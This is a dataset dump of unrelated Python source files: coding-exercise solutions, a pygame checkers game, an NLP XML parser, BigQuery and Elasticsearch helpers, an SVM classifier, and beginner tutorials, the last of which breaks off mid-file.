blob_id stringlengths 40 40 | language stringclasses 1
value | repo_name stringlengths 5 133 | path stringlengths 2 333 | src_encoding stringclasses 30
values | length_bytes int64 18 5.47M | score float64 2.52 5.81 | int_score int64 3 5 | detected_licenses listlengths 0 67 | license_type stringclasses 2
values | text stringlengths 12 5.47M | download_success bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|
2a98a61dd1808917200ad09786b37963648a1b2a | Python | zakaria967/hackerrank-solutions | /Standardize mobile number using Decorators/standardizemobilenumber.py | UTF-8 | 534 | 2.671875 | 3 | [] | no_license | from __future__ import print_function
a=[raw_input() for i in xrange(input())]
def standardize(phone):
if phone.startswith("0"):
return "+91 "+phone[1:6]+" "+phone[6:]
elif phone.startswith("91"):
if len(phone) == 10:
return "+91 "+phone[0:5]+" "+phone[5:]
else:
return "+91 "+phone[2:7]+" "+phone[7:]
elif len(phone) == 10:
return "+91 "+phone[0:5]+" "+phone[5:]
else: return phone[0:3]+" "+phone[3:8]+" "+phone[8:]
map(print, sorted(map(standardize, a)))
| true |
9a3051711511e39bd2ae40356af9a50b42b0f06b | Python | sulicat/tableTopSystem | /src/alexCode.py | UTF-8 | 13,460 | 3.078125 | 3 | [] | no_license | import sys
sys.path.append("../../")
import Graphics
import pygame
import numpy as np
import misc
class Checkers(Graphics.Game):
def __init__(self, name):
super().__init__(name)
self.care = 0
self.current_state = []
self.white = 12
self.black = 24
self.total_pieces = 24
self.turn = 0
self.xmoves, self.xfinal_moves, self.ymoves, self.yfinal_moves = [], [], [], []
self.wmoves, self.wfinal_moves, self.zmoves, self.zfinal_moves = [], [], [], []
#picked_up == 0 means anticipating piece being picked up
#picked_up == 1 means anticipating piece being placing down
self.picked_up = 0
self.kings = []
def start(self):
print("start Checkers")
# check if movement is within 2d array
def adjacent(self, a):
if (0 <= a[0] <= 7) and (0 <= a[1] <= 7):
return 1
else:
return 0
# checking adjacent tiles for movement
def move(self, current_state, value, move, location):
# will return single value (0, 1, 2) meaning (green, red, yellow) for squares
# will return array (moves) with possible movement options
# final_move is subset of moves with a different color showing no more jumps
# case where piece on same piece is in adjacent square
if current_state[move[0], move[1]] == value:
moves = [move[0], move[1]]
final_moves = [move[0], move[1]]
return 1, moves, final_moves
elif current_state[move[0], move[1]] == 0:
moves = [move[0], move[1]]
final_moves = [move[0], move[1]]
return 0, moves, final_moves
else:
move[0] = ((move[0] - location[0][0]) * 2) + location[0][0]
move[1] = ((move[1] - location[0][1]) * 2) + location[0][1]
moves, final_moves = [], []
if current_state[move[0]][move[1]] == 0:
if (value == self.white):
offs = 1
else:
offs = -1
move1 = [move[0] + offs, move[1] - 1]
move2 = [move[0] + offs, move[1] + 1]
move3 = [move[0] - offs, move[1] - 1]
move4 = [move[0] - offs, move[1] + 1]
move1, move2, move3, move4 = np.asarray(move1), np.asarray(move2), np.asarray(move3), np.asarray(move4)
m1, m2, m3, m4 = self.adjacent(move1), self.adjacent(move2), self.adjacent(move3), self.adjacent(move4)
if m1 == 1:
status, new_moves, new_final_moves = self.move(current_state, value, move1, [move])
if (status == 2):
for m in new_moves:
moves.append(m)
else:
for f in new_final_moves:
final_moves.append(f)
if m2 == 1:
status, new_moves, new_final_moves = self.move(current_state, value, move2, [move])
if (status == 2):
for m in new_moves:
moves.append(m)
else:
for f in new_final_moves:
final_moves.append(f)
if m3 == 1:
status, new_moves, new_final_moves = self.move(current_state, value, move2, [move])
if (status == 2):
for m in new_moves:
moves.append(m)
else:
for f in new_final_moves:
final_moves.append(f)
if m4 == 1:
status, new_moves, new_final_moves = self.move(current_state, value, move2, [move])
if (status == 2):
for m in new_moves:
moves.append(m)
else:
for f in new_final_moves:
final_moves.append(f)
moves.append(move)
return 2, moves, final_moves
def render(self, screen, board):
screen.fill((0, 0, 0))
misc.render_grid(screen)
#cell length and width
cw, ch = (screen.get_width()) / 8, (screen.get_height()) / 8
margin = 0
white_king = [[7, 0], [7, 2], [7, 4], [7, 6]]
black_king = [[0, 1], [0, 3], [0, 5], [0, 7]]
for r in range(8):
for c in range(8):
if (r % 2) == (c % 2):
pygame.draw.rect(screen, (255, 105, 180), (r * cw, c * ch, cw, ch))
else:
pass
if np.count_nonzero(board) == self.total_pieces:
self.care = 1
self.current_state = board
elif np.count_nonzero(board) <= self.total_pieces - 2 or np.count_nonzero(board) >= self.total_pieces + 2:
self.care = 0
else:
if self.care == 1:
location = np.asarray(np.where((self.current_state == board) == False)).T.tolist()
if len(location) > 0:
single_value = self.current_state[location[0][0]][location[0][1]]
pygame.draw.rect(screen, (255, 215, 0), ((7 - location[0][1]) * cw, location[0][0] * ch, cw, ch))
if self.turn % 2 == 0 and single_value == self.white:
pass
elif self.turn % 2 == 1 and single_value == self.black:
pass
else:
print("Not your turn!")
return
if single_value == self.white:
offs = 1
else:
offs = -1
move1 = [location[0][0] + offs, location[0][1] - 1]
move2 = [location[0][0] + offs, location[0][1] + 1]
move1, move2 = np.asarray(move1), np.asarray(move2)
m1, m2 = self.adjacent(move1), self.adjacent(move2)
#next few lines only apply to kings
move3 = [location[0][0] - offs, location[0][1] - 1]
move4 = [location[0][0] - offs, location[0][1] + 1]
move3, move4 = np.asarray(move3), np.asarray(move4)
m3, m4 = self.adjacent(move3), self.adjacent(move4)
if self.picked_up == 0:
#we now draw the squares for movement options if it is possible
if m1 == 1:
x, self.xmoves, self.xfinal_moves = \
self.move(self.current_state, single_value, move1, location)
if x == 0:
pygame.draw.rect(screen, (50, 120, 0),
((7 - self.xfinal_moves[1]) * cw, self.xfinal_moves[0] * ch, cw, ch))
elif x == 1: # x == 1
pygame.draw.rect(screen, (255, 0, 0),
((7 - self.xfinal_moves[1]) * cw, selx.ffinal_moves[0] * ch, cw, ch))
else:
#adjacent cell is enemy unit and chosen unit may jump
for mov in self.xmoves:
pygame.draw.rect(screen, (50, 120, 0), ((7 - mov[1]) * cw, mov[0] * ch, cw, ch))
for fmov in self.xfinal_moves:
pygame.draw.rect(screen, (0, 180, 0), ((7 - fmov[1]) * cw, fmov[0] * ch, cw, ch))
if m2 == 1:
y, self.ymoves, self.yfinal_moves = self.move(self.current_state, single_value, move2, location)
if y == 0:
pygame.draw.rect(screen, (50, 120, 0),
((7 - self.yfinal_moves[1]) * cw, self.yfinal_moves[0] * ch, cw, ch))
elif y == 1:
pygame.draw.rect(screen, (255, 0, 0),
((7 - self.yfinal_moves[1]) * cw, self.yfinal_moves[0] * ch, cw, ch))
else:
for mov in self.ymoves:
pygame.draw.rect(screen, (50, 120, 0), ((7 - mov[1]) * cw, mov[0] * ch, cw, ch))
for fmov in self.yfinal_moves:
pygame.draw.rect(screen, (0, 255, 0), ((7 - fmov[1]) * cw, fmov[0] * ch, cw, ch))
if location in kings:
if m3 == 1:
w, self.wmoves, self.wfinal_moves = self.move(self.current_state, single_value,
move3, location)
if w == 0:
pygame.draw.rect(screen, (50, 120, 0),
(
(7 - self.wfinal_moves[1]) * cw, self.wfinal_moves[0] * ch, cw,
ch))
elif w == 1:
pygame.draw.rect(screen, (255, 0, 0),
(
(7 - self.wfinal_moves[1]) * cw, self.wfinal_moves[0] * ch, cw,
ch))
else:
for mov in self.wmoves:
pygame.draw.rect(screen, (50, 120, 0),
((7 - mov[1]) * cw, mov[0] * ch, cw, ch))
for fmov in self.wfinal_moves:
pygame.draw.rect(screen, (0, 255, 0),
((7 - fmov[1]) * cw, fmov[0] * ch, cw, ch))
if m4 == 1:
z, self.zmoves, self.zfinal_moves = self.move(self.current_state, single_value,
move4, location)
if z == 0:
pygame.draw.rect(screen, (50, 120, 0),
((7 - self.zfinal_moves[1]) * cw, self.zfinal_moves[0] * ch, cw,
ch))
elif z == 1:
pygame.draw.rect(screen, (255, 0, 0),
((7 - self.zfinal_moves[1]) * cw, self.zfinal_moves[0] * ch, cw,
ch))
else:
for mov in self.zmoves:
pygame.draw.rect(screen, (50, 120, 0),
((7 - mov[1]) * cw, mov[0] * ch, cw, ch))
for fmov in self.zfinal_moves:
pygame.draw.rect(screen, (0, 255, 0),
((7 - fmov[1]) * cw, fmov[0] * ch, cw, ch))
self.picked_up = self.picked_up + 1
else:
#remove duplicates in moves found in final_moves
for i in xmoves:
for j in xfinal_moves:
if i == j:
del[i]
for i in ymoves:
for j in yfinal_moves:
if i == j:
del[i]
#check if legal move
if location in kings:
if location in (self.xfinal_moves or self.yfinal_moves or self.wfinal_moves or self.zfinal_moves):
#function to find pieces removed from move
self.total_pieces = self.total_pieces - remove
elif location in self.xfinal_moves or location in self.yfinal_moves:
#function to find pieces removed from move
self.total_pieces = self.total_pieces - remove
else:
print("Not a valid move!")
return
for w in white_king:
if location == white_king and single_value == self.white:
kings.append(location)
for b in black_king:
if location == black_king and single_value == self.black:
kings.append(location)
#remove duplicates later
self.picked_up = self.picked_up - 1
self.turn = self.turn + 0.5
def end(self):
print("end test")
| true |
2ed09a8fbde558a317e6a3795eab4a013f6e14b5 | Python | tmu-nlp/100knock2016 | /ryosuke/chapter06/knock58.py | UTF-8 | 2,873 | 2.703125 | 3 | [] | no_license | from collections import defaultdict
import xml.sax as sax
class SVOSlot:
def __init__(self):
self.s = None
self.v = None
self.o = None
def is_filled(self):
return self.s is not None and self.v is not None and self.o is not None
def fill_s(self, s):
self.s = s
def fill_v(self, v):
self.v = v
def fill_o(self, o):
self.o = o
def get_svo(self):
return self.s, self.v, self.o
class StanfordCoreXMLHandler(sax.handler.ContentHandler):
def __init__(self):
self.tags = list()
self.in_dependencies = False
self.vid2svo = defaultdict(SVOSlot)
self.already = set()
def startElement(self, name, attrs):
self.push_tag(name)
if name == 'sentence' and 'id' in attrs:
self.sent_id = attrs['id']
if name == 'dependencies' and \
'type' in attrs and attrs['type'] == 'collapsed-dependencies':
self.in_dependencies = True
if self.in_dependencies and name == 'dep' and 'type' in attrs:
self.type = attrs['type']
if self.in_dependencies and name == 'governor':
self.gov_id = '{}_{}'.format(self.sent_id, attrs['idx'])
def characters(self, content):
if self.in_dependencies:
if self.current_tag() == 'governor':
if self.gov_id in self.already:
pass
else:
svo = self.vid2svo[self.gov_id]
if self.type == 'nsubj':
svo.fill_v(content)
if self.current_tag() == 'dependent':
if self.gov_id in self.already:
pass
else:
svo = self.vid2svo[self.gov_id]
if self.type == 'nsubj':
svo.fill_s(content)
if svo.is_filled():
print('{}\t{}\t{}'.format(*svo.get_svo()))
self.vid2svo[self.gov_id] = None
self.already.add(self.gov_id)
elif self.type == 'dobj':
svo.fill_o(content)
if svo.is_filled():
print('{}\t{}\t{}'.format(*svo.get_svo()))
self.vid2svo[self.gov_id] = None
self.already.add(self.gov_id)
def endElement(self, name):
self.pop_tag()
if name == 'dependencies':
self.is_representative = False
def current_tag(self):
return self.tags[-1]
def push_tag(self, tag):
self.tags.append(tag)
def pop_tag(self):
return self.tags.pop(-1)
parser = sax.make_parser()
handler = StanfordCoreXMLHandler()
parser.setContentHandler(handler)
parser.parse(open('nlp.xml'))
| true |
cc989fc6030243b79d611dad353153987cf1fd9e | Python | ljxproject/comics | /api/helpers/decorator.py | UTF-8 | 741 | 2.578125 | 3 | [] | no_license | from api.helpers import hump_to_attr
def set_attr(func):
def inner(instance, request):
for k, v in request.data.items():
if not v:
continue
# if v == "en":
# setattr(instance, hump_to_attr(k), "ms")
# print(getattr(instance,"lang"),"1")
if k == "email":
setattr(instance, hump_to_attr(k), v.lower())
else:
setattr(instance, hump_to_attr(k), v)
if not hasattr(instance, "lang"):
setattr(instance, "lang", "ms")
else:
if getattr(instance, "lang") == "en":
setattr(instance, "lang", "ms")
return func(instance, request)
return inner
| true |
20c374cd15558a5c96ba186778de4821a949a681 | Python | sunshy2008/autotestwork | /workspace/finalscripts/PyUnitTest/testclass.py | UTF-8 | 236 | 2.625 | 3 | [] | no_license | # -*- coding: utf-8 -*-
class testnum():
def sumnum(self,a,b):
return a + b
def delnum(self,a,b):
return a - b
def hello(self):
return "hello world"
def chengfa(self,a,b):
return a * b | true |
2d3c74e8d813080b1a133df1bbb53049855fcd7c | Python | harshitanand/Hackerrank-Solutions | /Algorithms/Warmup/DiagonalDifference.py | UTF-8 | 232 | 2.875 | 3 | [] | no_license | #!/bin/python
import sys
if __name__ == "__main__":
n = int(raw_input().strip())
res = 0
for i in xrange(n):
arr = map(int,raw_input().strip().split(' '))
res += arr[i]-arr[-(i+1)]
print abs(res)
| true |
96db95bd7566d535c909bf997a3b704cd75fdea5 | Python | GabrielEstevam/icpc_contest_training | /uri/uri_python/ad_hoc/p1032.py | UTF-8 | 506 | 2.84375 | 3 | [] | no_license | N = 32700
num = []
for i in range(N):
num.append(1)
i = 2
while True:
k = i * 2
while k < N:
num[k] = 0
k += i
i += 1
while i < N:
if num[i]:
break
i += 1
if i == N:
break
primes = []
for i in range(1, N):
if num[i]:
primes.append(i)
N = int(input())
while N != 0:
flag = []
for i in range(1, N+1):
flag.append(i)
j = 0
for i in range(N-1):
k = primes[i + 1]
j += (k - 1)
#if j >= N-i:
j = j % (N-i)
flag.remove(flag[j])
print(flag[0])
N = int(input())
| true |
50121b1712108040fc973cb8eedaf78fed1a61c6 | Python | PClark344/Demos-Learning | /Comprehensions.py | UTF-8 | 1,104 | 4.28125 | 4 | [] | no_license | # python comprehensions
# numbers
num = range(10)
print([x*x for x in num if x % 2 ==0])
print(chr(10))
print([i for i in range(300) if i % 27 == 0])
print(chr(10))
msg = 'Hello 242 World'
nums = [int(x) for x in msg if x.isdigit()]
print('numbers in ',msg,' are: ',nums)
print(chr(10))
num_list = [number for number in range(51) if number % 2 ==0 if number % 5 == 0]
print('num_list = ',num_list)
print(chr(10))
nums = [12,66,33,22,95,87,64,19]
res = ['small' if num < 20 else 'large' for num in nums if num %2 == 0 if num %3 == 0]
print('Result = ',res)
# strings
print([letter for letter in 'anxiety'])
print(chr(10))
#print([i for i in "Mathematics" if i in ["A","E","I","O","U"])
# lists
list_of_weeks = ['this','is','a','list','of','weeks','honest']
print([word[0] for word in list_of_weeks])
print(chr(10))
print([word.upper() for word in list_of_weeks])
print(chr(10))
print([word[0].upper() for word in list_of_weeks])
print(chr(10))
# nested loops
stationery = ['Pen','Rubber','Ink']
colours = ['Red','Blue','Green']
combined = [(i,j) for j in stationery for i in colours]
print(combined)
| true |
b767d7fabe9cc42724fa383a202bc11bae039786 | Python | rrwielema/ezgoogleapi | /ezgoogleapi/bigquery/base.py | UTF-8 | 6,058 | 2.9375 | 3 | [
"MIT"
] | permissive | import math
import warnings
from typing import Union
import pandas as pd
from google.cloud import bigquery
import os
from ezgoogleapi.common.validation import check_keyfile
BASE_DIR = os.getcwd()
class BigQuery:
def __init__(self, keyfile: str):
if not os.path.isabs(keyfile):
keyfile = BASE_DIR + '\\' + keyfile
self.keyfile = check_keyfile(keyfile)
os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = keyfile
self.client = bigquery.Client()
self.table = None
self.table_name = None
def set_table(self, table):
if not check_table_format(table):
raise ValueError(f'{table} is not a valid BigQuery table name. It should follow the format '
f'Project.Dataset.TableName.')
else:
self.table = table
self.table_name = table.split('.')[2]
def create_table(self, schema: list):
sch = []
for field in schema:
if type(field) == list:
sch.append(bigquery.SchemaField(field[0], field[1]))
else:
sch.append(bigquery.SchemaField(field, "STRING"))
new_table = bigquery.Table(self.table, schema=sch)
self.client.create_table(new_table)
print(f'Created table {self.table_name}')
def delete_table(self, sure: bool = False):
check_table(self.table)
if not sure:
raise UserWarning(
f'If you are sure you want to delete {self.table_name}, pass the sure=True option for the '
f'delete_table() function. There is no way to recover the table once it has been deleted.')
else:
self.client.delete_table(self.table, not_found_ok=True)
print(f'Table {self.table} was deleted')
def delete_rows(self, condition: str = None, sure: bool = False):
check_table(self.table)
if not condition and not sure:
raise UserWarning(f'Running delete_records() without a condition deletes every row in '
f'table {self.table_name}. If you are sure you want this, pass the sure=True parameter. '
f'Otherwise, provide a condition.')
query = f'DELETE FROM {self.table}'
if condition:
query += ' WHERE ' + condition
query_job = self.client.query(query)
if not query_job:
print('Rows deleted')
def insert_rows(self, data: Union[list, dict, pd.DataFrame], per_request: int = 10000):
if per_request > 10000 or per_request < 0 or type(per_request) != int:
warnings.warn('Invalid entry. The per_request parameter is between 0 and 10000. Value will be set to 10000',
UserWarning)
per_request = 10000
check_table(self.table)
if type(data) != pd.DataFrame:
if type(data[0]) == dict:
df = pd.DataFrame(data)
elif type(data[0]) == list:
columns = data[0]
values = data[1:]
df = pd.DataFrame(columns=columns, data=values)
else:
raise TypeError(
'Data is not specified in the correct format. It needs to be either:\n\n'
' - a pandas DataFrame\n'
' - a list containing dictionaries with the same keys in each dictionary\n'
' - a list containing lists where the first list represents the headers and the following contain '
'the data '
)
else:
df = data
to_write = df.to_dict('records')
for x in range(0, math.ceil(len(to_write) / per_request)):
if x == math.ceil(len(to_write) / per_request) - 1:
insert = to_write[0 + (x * per_request):]
else:
insert = to_write[0 + (x * per_request): per_request + (x * per_request)]
errors = self.client.insert_rows_json(self.table, insert)
if not errors:
print(f"{len(insert)} rows added to table {self.table_name}")
else:
print(f"Error: {errors}")
def read_table(self, columns: Union[list, str] = None, condition=None, return_format='df'):
check_table(self.table)
if columns:
if type(columns) == list:
query = f'SELECT {", ".join(columns)} FROM {self.table}'
elif type(columns) == str:
query = f'SELECT {columns} FROM {self.table}'
else:
raise ValueError(f'Incorrect data type \'{type(columns)}\' for parameter \'columns\'. Supply either '
f'\'str\' or \'list\'')
else:
query = f'SELECT * FROM {self.table}'
if condition:
query += ' WHERE ' + condition
query_job = self.client.query(query)
result = query_job.result()
result_rows = []
for row in result:
row_values = dict(zip(list(row.keys()), list(row.values())))
result_rows.append(row_values)
if return_format == 'list':
return [f.values() for f in result_rows]
elif return_format == 'dict':
return result_rows
elif return_format == 'df':
return pd.DataFrame(result_rows)
else:
warnings.warn(
f"Format {return_format} is not valid. There will be data returned in the form of a pd.DataFrame.\n"
f"The valid formats are:\n\n"
f"'df' - Returns pandas DataFrame (default).\n"
f"'dict' - Returns list of dictionaries.\n"
f"'list' - Returns list of lists containing the rows. Headers will be lost."
)
def check_table_format(table):
return len(table.split('.')) == 3
def check_table(table):
if not table:
raise UserWarning(
'No table was specified via the BigQuery.set_table("Project.database.table") method.'
)
| true |
cb2859ec355367a4ce8920baeec509495b7b9fb1 | Python | dleebrown/misc_plots | /single_solar_gen.py | UTF-8 | 676 | 2.875 | 3 | [] | no_license | # make a nice plot of solar spectrum and saves with no background
import numpy as np
import matplotlib.pyplot as plt
solardata = np.genfromtxt('../misc_data/objs_ap5.txt')
solar_wave = solardata[500:1541, 0]
solar_flux = solardata[500:1541, 1]
solar_wave = solar_wave + 0.42
solar_flux = solar_flux - 0.009
fig=plt.figure(figsize=(35,4.5))
plt.plot(solar_wave, solar_flux, linewidth=3.0, color='Black', label='Sun, T=5770')
plt.xticks(np.arange(6600, 6800.5, 3))
plt.yticks(np.arange(.70, 1.05, 0.05))
plt.xlim((6690, 6730))
plt.ylim((0.67, 1.03))
plt.tick_params(labelsize=14)
plt.savefig('justthesun', format='png', transparent=True, bbox_inches='tight')
plt.show() | true |
9a33870148dcdd260a35d69b3d279b07edddc2c2 | Python | xiaochaotest/Local-submission | /automation_testing_day01/show_testing/python_basics/set_Test.py | UTF-8 | 1,440 | 4.09375 | 4 | [] | no_license | #!/usr/bin/env python
#-*- coding:utf-8 -*-
# author: Peng Chao
'''
set集合
set集合是一个无序并且不重复的元素集合,他的关键字是set
依照之前的思维方式,我们定义一个set集合,来看他的类所具备的功能以及对象功能的详细信息,这样的目的很简单,很多时候我们不可能把字典,列表,元组,set集合类的方法都记得那么清楚,但是使用的时候,我们可以通过dir()
和help()来获取他的详细信息,来实现所要实现的东西
'''
s = set()
# print u'set对象类的功能为:',dir(s)
# print u'set对象的详细信息:',help(type(s))
#集合插入数据
s.add('xiaochao')
print u'插入数据后集合的内容:',s,type(s)
#把列表转换为集合
list1 = [11,21,51,45,36,4]
print u'列表list1转换为集合后:',set(list1),type(set(list1))
#查看b集合存在,a集合不存在的情况
b = {1,2,25,36,6}
a = {5,87,9,1,88}
print u'查看b集合存在,a集合不存在的内容:',b.difference(a)
print u'移除指定的集合,不存在不会出现错误:',b.discard('xiaochao')
print u'查看集合a,b都存在的值:',a.intersection(b)
#没有交集,返回true,存在交集返回false
print u'判断集合a,b是否存在交集:',a.isdisjoint(b)
print u'移除集合的元素并且获取值:',a.pop()
print u'获取a,b集合的并集:',a.union(b)
b.update(a)
print u'集合b更新后的内容为:',b
| true |
c8cd4854722b4ae034f4805189991497916c04c3 | Python | Janik-B/BA | /visualization/convergence_plot_utils.py | UTF-8 | 1,671 | 3.15625 | 3 | [] | no_license | import matplotlib.pyplot as plt
from algorithms.gradient_descent import *
def plot_iterates_on_function(ax, function, x_val, x_min, x_max, title):
y_val = [function(x) for x in x_val]
z_val = np.arange(len(x_val))
xs = np.linspace(x_min, x_max, 100)
ys = [function(x) for x in xs]
ax.plot(xs, ys)
ax.plot(x_val, y_val)
cm = plt.cm.get_cmap('RdYlBu')
ax.scatter(x_val, y_val, c=z_val, vmin=0, vmax=len(x_val), cmap=cm)
ax.set_title(title)
def plot_iterates_on_level_sets(ax, function, x_val, x_min, x_max, y_min, y_max, title):
x = np.linspace(x_min, x_max, 250)
y = np.linspace(y_min, y_max, 250)
X, Y = np.meshgrid(x, y)
Z = function([X, Y])
number_of_level_sets = 10
ax.contour(X, Y, Z, number_of_level_sets, cmap='jet')
angles_x = x_val[1:, 0] - x_val[:-1, 0]
angles_y = x_val[1:, 1] - x_val[:-1, 1]
ax.scatter(x_val[:, 0], x_val[:, 1], color='r', marker='*', s=1)
ax.quiver(x_val[:-1, 0], x_val[:-1, 1], angles_x, angles_y, scale_units='xy', angles='xy', scale=1, color='r',
alpha=.3)
ax.set_xlabel("{} Iterationen".format(len(x_val[1:])))
ax.set_title(title)
def plot_error_convergence(ax, x_vals, learning_rates, function, minimum, title, param_name):
f_min = function(minimum)
for i in range(len(x_vals)):
y_val = [abs(function(x) - f_min) for x in x_vals[i]]
ax.plot(range(len(x_vals[i])), y_val,
label=param_name + format(learning_rates[i], '.6f'))
ax.legend()
ax.set_yscale('log')
ax.set_ylabel("Fehler")
ax.set_xlabel("Iteration")
ax.set_title(title)
| true |
6d6cd82bb9985eb7458889271c8fae798316cd45 | Python | ankurjain8448/leetcode | /ugly-number.py | UTF-8 | 948 | 3.171875 | 3 | [] | no_license | class Solution(object):
def isUgly(self, num):
"""
:type num: int
:rtype: bool
"""
# check 2**n form
n = num
if n == 0 :
return False
if n & (n-1) == 0:
return True
two = 0
three = 0
five = 0
while n > 1:
ff = True
if n%2 == 0 :
ff = False
n /= 2
two += 1
if n%3 == 0:
ff = False
n /= 3
three += 1
if n%5 == 0:
ff = False
n /= 5
five += 1
if ff :
break
nn = 1
if two > 0:
nn *= 2**two
if three > 0 :
nn *= 3**three
if five > 0:
nn *= 5**five
if nn == num:
return True
return False | true |
3e512bc6182171750b631770d591911684890d53 | Python | bear-trends/ftc-utils | /ftc_utils/data/api.py | UTF-8 | 3,036 | 2.515625 | 3 | [] | no_license | from .importer import Importer
from .exporter import Exporter
from requests_aws4auth import AWS4Auth
from elasticsearch import Elasticsearch, RequestsHttpConnection
import boto3
import os
import json
def load_importer_exporter(
mode='local',
aws_bucket='',
local_path=''
):
"""Make importer and exporter classes
Args:
mode (str, optional): exporting mode, s3 or local.
Defaults to 'local'.
aws_bucket (str, optional): if mode = 's3'.
Defaults to ''.
local_path (str, optional): if mode = 'local'.
Defaults to ''.
Returns:
[utils.Importer]: Importer module
[utils.Exporter]: Exporter module
"""
importer = Importer(
mode=mode,
aws_bucket=aws_bucket,
local_path=local_path
)
exporter = Exporter(
mode=mode,
aws_bucket=aws_bucket,
local_path=local_path
)
return importer, exporter
def get_es_connection():
"""Get elastic search connection object
Returns:
[elasticsearch.Elasticsearch]: connection object
"""
s3_client = boto3.client(
service_name='s3'
)
key_file = s3_client.get_object(
Bucket='ftc-data-storage', Key='api_keys.json'
)['Body'].read()
host = json.loads(key_file)['es_instance_host']
region = 'eu-west-3'
service = 'es'
credentials = boto3.Session().get_credentials()
awsauth = AWS4Auth(
credentials.access_key,
credentials.secret_key,
region, service,
session_token=credentials.token
)
es = Elasticsearch(
hosts=[{'host': host, 'port': 443}],
http_auth=awsauth,
use_ssl=True,
verify_certs=True,
connection_class=RequestsHttpConnection
)
return es
def make_es_indices(
tables=[
'items',
'users',
'brands',
'photos',
'accounts'
]
):
"""Creates indexes on aws s3
according to mappings
Args:
tables (list, optional): indexes to create
Defaults to [ 'items', 'users', 'brands', 'photos', 'accounts' ].
"""
es = get_es_connection()
folder_path = os.path.dirname(os.path.abspath(__file__))
for table in tables:
table_path = f'mappings/{table}.json'
path = os.path.join(folder_path, table_path)
with open(path, 'r') as f:
mapping = json.load(f)
es.indices.create(
index=table,
body=mapping
)
def update_mappings(tables=[
'items',
'users',
'brands',
'photos',
'accounts'
]
):
es = get_es_connection()
folder_path = os.path.dirname(os.path.abspath(__file__))
for table in tables:
table_path = f'mappings/{table}.json'
path = os.path.join(folder_path, table_path)
with open(path, 'r') as f:
mapping = json.load(f)
es.indices.put_mapping(
index=table,
body=mapping['mappings']
)
| true |
0760246ccb2431d098489cac868ce095272bbbf0 | Python | Chappie733/MLPack | /classification/svm.py | UTF-8 | 4,297 | 2.578125 | 3 | [
"MIT"
] | permissive | import numpy as np
from cvxopt import matrix, solvers
from classification.classifier import Classifier
# Lagrange multipliers threshold
DEFAULT_LM_THRESHOLD = 1e-4
KERNELS = {}
def logger(kernel):
global KERNELS
KERNELS[kernel.__name__] = kernel
return kernel
@logger
def linear(x,y, **kwargs):
return np.dot(x,y)
@logger
def polynomial(x,y, **kwargs):
return (np.dot(x,y)+kwargs['c'])**kwargs['n']
@logger
def gaussian(x,y, **kwargs):
return np.exp(-np.linalg.norm(x-y)/(2*kwargs['stddev']**2))
@logger
def rbf(x,y, **kwargs):
return np.exp(-kwargs['gamma']*np.linalg.norm(x-y))
@logger
def sigmoid(x,y, **kwargs):
return np.tanh(kwargs['gamma']*np.dot(x,y)+kwargs['c'])
class SVM(Classifier):
def __init__(self, kernel='linear', name='SVM', **kwargs):
super().__init__(1, 2, name, _type=2)
self.kernel = kernel if not isinstance(kernel, str) else KERNELS[kernel]
self.name = name
self.c = 0 if 'c' not in kwargs else kwargs['c']
self.stddev = 1 if 'stddev' not in kwargs else kwargs['stddev']
self.n = 1 if 'n' not in kwargs else kwargs['n']
self.gamma = 1 if 'gamma' not in kwargs else kwargs['gamma']
self.threshold = DEFAULT_LM_THRESHOLD if 'threshold' not in kwargs else kwargs['threshold']
def _predict(self, x):
s = self.bias
for i in range(len(self.alphas)):
s += self.alphas[i]*self.Y[i]*self.kernel(self.X[i], x, c=self.c, stddev=self.stddev, n=self.n, gamma=self.gamma)
return 1 if s >= 0 else -1 # s could be 0, np.sign(0) = 0
def fit(self, X, Y, verbose=True, *args, **kwargs):
if not isinstance(Y, np.ndarray):
Y = np.array(Y)
if not isinstance(X, np.ndarray):
X = np.array(X)
p = len(X)
self.X = X
self.Y = Y
self.N = X.shape[1]
P = matrix(0.0, (p,p))
for j in range(p):
for i in range(p):
P[i,j] = self.kernel(X[i], X[j], c=self.c, stddev=self.stddev, n=self.n, gamma=self.gamma)
Y_mat = np.vstack([Y]*p)
P = matrix(P*(Y_mat*Y_mat.T))
q = matrix(-np.ones(shape=(p,)))
h = matrix(np.zeros(p,))
G = matrix(-np.eye(p))
b = matrix(0.0, (1,1))
A = matrix(np.reshape(Y, (1,p)))
solvers.options['show_progress'] = verbose
self.alphas = np.ravel(solvers.qp(P, q, G, h, A, b)['x'])
indices = np.where(self.alphas >= self.threshold)
self.X = X[indices]
self.Y = Y[indices]
self.alphas = self.alphas[indices]
j = indices[0][0]
# calculate the bias
sum_term = 0
for i in range(len(self.alphas)):
sum_term += self.alphas[i]*self.Y[i]*self.kernel(self.X[i], X[j], c=self.c, stddev=self.stddev, n=self.n, gamma=self.gamma)
self.bias = Y[j]-sum_term
# Hinge loss
def loss(self, Y, predictions):
return np.sum(np.maximum(1-Y*predictions, 0))
def _save(self, file):
file.create_dataset('alphas', self.alphas.shape, np.float32, self.alphas, compression="gzip")
file.create_dataset('bias', (1,), np.float32, self.bias, compression="gzip")
file.create_dataset('data_X', self.X.shape, np.float32, self.X, compression="gzip")
file.create_dataset('data_Y', self.Y.shape, np.float32, self.Y, compression="gzip")
file.create_dataset('params', (5,), np.float32, [self.c, self.stddev, self.n, self.gamma, self.threshold], compression="gzip")
kernel_name_ASCII = np.array([ord(x) for x in self.kernel.__name__], dtype=np.ubyte)
file.create_dataset('kernel', kernel_name_ASCII.shape, np.ubyte, kernel_name_ASCII, compression="gzip")
def _load(self, file):
self.alphas = np.array(file['alphas'])
self.bias = file['bias'][0]
self.X = np.array(file['data_X'], dtype=np.float32)
self.Y = np.array(file['data_Y'], dtype=np.float32)
self.c, self.stddev, self.n, self.gamma, self.threshold = file['params']
self.name = ''.join([chr(x) for x in file['name']])
self.kernel = KERNELS[''.join([chr(x) for x in file['kernel']])] | true |
817d5e894cc7906a277d78a773e997d958d82669 | Python | mrseidel-classes/archives | /ICS3U/ICS3U-2019-2020S/Code/notes/11 - constants_and_variables/basics.py | UTF-8 | 1,619 | 4.78125 | 5 | [
"MIT"
] | permissive | #-----------------------------------------------------------------------------
# Name: Some Basics (basics.py)
# Purpose: To provide a sample program about the basics of Python
#
# Author: Mr. Seidel
# Created: 14-Aug-2018
# Updated: 28-Sep-2018
#-----------------------------------------------------------------------------
# Printing the addition of two integers
print(str(1 + 2))
# Printing of the subtraction of two floats
print(str(4.3 - 2.1))
# Boolean values
right = True
wrong = False
print(str(right))
print(str(wrong))
# Two integers to be used for the rest of the program.
integerOne = 1
